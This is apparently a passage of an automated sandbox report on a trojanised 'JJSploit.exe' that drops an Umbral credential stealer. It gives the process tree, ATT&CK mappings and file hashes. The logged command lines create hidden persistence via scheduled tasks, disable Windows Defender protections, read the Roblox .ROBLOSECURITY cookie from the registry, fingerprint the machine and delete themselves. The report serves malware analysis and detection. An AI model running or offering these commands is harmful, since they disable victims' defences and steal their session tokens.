    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1740
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3652
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1220
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3684
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4548
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4768
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2520
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:216
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3780
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3032
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1200
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4688
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:5052
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1796
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:2112
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3136
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:5032
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4048
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3108
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3760
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:1972
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:2708
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4928
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3532
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3556
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4588
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3012
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:2544
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3344
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4800
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4320
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1164
- - C:\Windows\SYSTEM32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:3084
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:4904
- C:\Users\Admin\AppData\Local\Temp\Umbral.exe
  "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2456
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    3⤵
    - Views/modifies file attributes
    PID:1744
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2500
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:856
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4224
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4252
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4764
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:724
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1224
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3644
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    - Suspicious behavior: EnumeratesProcesses
    PID:2200
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:3988
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3940

C:\Users\Admin\xdwdSkype.exe
"C:\Users\Admin\xdwdSkype.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2824
- C:\Windows\system32\CMD.exe
  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
  2⤵
  PID:4756
- - C:\Windows\system32\schtasks.exe
    SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
    3⤵
    PID:4600
- C:\Windows\xdwdWPS.exe
  "C:\Windows\xdwdWPS.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:4688
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4992
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:3628
- - C:\Windows\system32\CMD.exe
    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST & exit
    3⤵
    PID:4892
  - - C:\Windows\system32\schtasks.exe
      SchTaSKs /create /f /sc minute /mo -1 /tn "windeep" /tr "C:\Windows\xdwdWPS.exe" /RL HIGHEST
      4⤵
      PID:4584

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
a9ab4419e3986b8e240c9478cc52eb51

SHA1
7e1b1b31bc47b9d4dccea76e6511d3632cb0395e

SHA256
87c993fd034df762cdf24506c046959e98985d38697b234f7ca092db49671846

SHA512
8f3d3ac39795b11719f40d3eb9a574576c8a5e6b837a1f3d63f7996faaf728e02ec5e26f4bed71ab850c9fa9272ec94fb6449b251eadc82672f84bdd5ec256a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8e1fdd1b66d2fee9f6a052524d4ddca5

SHA1
0a9d0994559d1be2eecd8b0d6960540ca627bdb6

SHA256
4cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13

SHA512
5a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
beaa733206e6159a16f84258a3868738

SHA1
5d973073d1fb8bf3b4654ad9172b1519c5ee3ce7

SHA256
d5387e07c332114cd393c847f7e0fe5108ec208798391a756fc1298daab786dd

SHA512
0fa50d16101a53ff2c43c62e370462feeae1283b6c33167d1ca9e293d2373f00e16f289f07caabe5789aa633c3a622bca4d3e499fd6af38001a3dbcee454b73f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
60b3262c3163ee3d466199160b9ed07d

SHA1
994ece4ea4e61de0be2fdd580f87e3415f9e1ff6

SHA256
e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb

SHA512
081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af

Download Submit
C:\Users\Admin\AppData\Local\Temp\JJSploit.exe

Filesize
10.0MB

MD5
d5d2e3c5614a7d174d6a402f8261f4da

SHA1
acd83341f400a38e8efd1921e4d219bd6a90277e

SHA256
b4446a0710b742eabcd47708aba123e2acab13ecba33756e1fc0a1e2c771a2f0

SHA512
e0f4974c000c61f33d396fef817b656de8d6cd41663cb2072ff689fa6e9dcd87fa441adaa9055c73854d14650141358d8785c2d5b78eb69265cbaafaf73814c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Umbral.exe

Filesize
231KB

MD5
6666c618cfef7187d04f9eb7d0cda700

SHA1
3a3ae164b936113dd895dc1d6bf69ff8e13b4ebe

SHA256
591be99ca233dc0bfb5e64b9fc22309c7019f401375aa2fcf0fc87ef3789c371

SHA512
10b100b9c8d173a1d340e76325b2a52273ef9121c2b560f80d26e785606e60a5a291d9df3f80b442b0ab9e0a5368344881beca4236d604021a74a78ba1acc3ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_srpluzzm.zto.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Desktop\JJSploit.exe

Filesize
10.3MB

MD5
779e78c27d9bc8c7fb68e25a7799cad0

SHA1
b5e8956f6d6b0ad63f275bf09c41d0f6429a098a

SHA256
4f0bfb2c0b27a170aee3698f475e73fdb6aee18b6f79595b1af65198807ec95f

SHA512
757e2e3e763f385d39a5033132002c7456173fa0a3a67fc010519b71f2f53a2fb710cc7f49999f89f3e1e7b44b99fcab212ace1c414894a85a9d4b315e7c7727

Download Submit
C:\Windows\xdwd.dll

Filesize
136KB

MD5
16e5a492c9c6ae34c59683be9c51fa31

SHA1
97031b41f5c56f371c28ae0d62a2df7d585adaba

SHA256
35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66

SHA512
20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

Download Submit
memory/864-75-0x0000000000E60000-0x0000000000ED0000-memory.dmp

Filesize
448KB

Download
memory/1528-76-0x0000000000400000-0x0000000000E4E000-memory.dmp

Filesize
10.3MB

Download
memory/2456-102-0x000001E8A1D80000-0x000001E8A1DF6000-memory.dmp

Filesize
472KB

Download
memory/2456-104-0x000001E8A1D50000-0x000001E8A1D6E000-memory.dmp

Filesize
120KB

Download
memory/2456-103-0x000001E8A1E00000-0x000001E8A1E50000-memory.dmp

Filesize
320KB

Download
memory/2456-128-0x000001E8A1E50000-0x000001E8A1E5A000-memory.dmp

Filesize
40KB

Download
memory/2456-129-0x000001E8A1E80000-0x000001E8A1E92000-memory.dmp

Filesize
72KB

Download
memory/2456-74-0x000001E887660000-0x000001E8876A0000-memory.dmp

Filesize
256KB

Download
memory/2500-77-0x000002473E710000-0x000002473E732000-memory.dmp

Filesize
136KB

Download